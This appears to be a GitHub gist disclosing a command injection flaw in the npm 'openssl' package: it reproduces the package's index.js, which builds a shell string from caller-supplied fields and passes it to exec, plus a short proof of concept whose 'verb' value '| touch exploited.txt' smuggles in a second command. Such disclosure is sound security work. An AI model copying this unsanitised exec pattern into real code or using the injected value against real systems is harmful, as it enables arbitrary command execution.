Last active
August 20, 2024 12:12
-
-
Save mcoimbra/b05a55a5760172dccaa0a827647ad63e to your computer and use it in GitHub Desktop.
Package openssl: Function exec is called (#41) and a single argument ("command") is passed to the function, enabling the injection of commands. The package's exported openssl() function (see index.js in this gist) takes an 'opts' argument which has 'verb' field which can be the injection command, such as "| touch exploited.txt".
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* "index.js" is the package's file. | |
*/ | |
'use strict'; | |
const util = require('util'); | |
const fs = require('fs'); | |
const { exec } = require('child_process'); | |
const debug = util.debuglog('node-openssl'); | |
function openssl() { | |
const opts = arguments[0]; console.log(opts); | |
var { verb, flags, tail } = opts; console.log(flags); | |
debug(`> openssl`); | |
debug(`Found ${Object.keys(opts).length} properties.`); | |
return new Promise(function execPromiseHandler(resolve, reject) { | |
if (typeof flags !== 'string' || Array.isArray(flags)) { | |
reject( | |
new Error( | |
`'flags' option must be an array or string of openssl ${verb} command flags.`, | |
), | |
); | |
} | |
if (Array.isArray(flags)) { | |
flags = flags.join(' '); | |
} | |
if ( | |
typeof tail !== 'undefined' && | |
typeof tail !== 'string' && | |
typeof tail !== 'number' | |
) { | |
reject(new Error(`'tail' option must be a string or number argument.`)); | |
if (typeof tail === 'number') { | |
tail = tail.toString(); | |
} | |
} | |
var stdout = ''; | |
var stderr = ''; | |
const command = `openssl ${verb} ${flags} ${tail}`; | |
debug(`Executing: ${command}`); | |
const cp = exec(command); console.log(command); | |
cp.stdout.on('data', (data) => { | |
stdout += data; | |
}); | |
cp.stderr.on('data', (data) => { | |
stderr += data; | |
}); | |
cp.on('close', (code) => { | |
debug(`< openssl`); | |
resolve({ cwd: process.cwd(), stdout, stderr }); | |
}); | |
cp.on('error', (err) => { | |
reject(err); | |
}); | |
}); | |
} | |
module.exports = openssl; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* "openssl-2.0.0_poc.js" is the proof-of-concept. | |
*/ | |
const openssl = require('openssl'); | |
const opts = { | |
verb: "| touch exploited.txt", | |
flags: "", | |
tail: "" | |
}; | |
/* | |
* This will create a local 'exploited.txt' file. | |
*/ | |
const r = openssl(opts); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment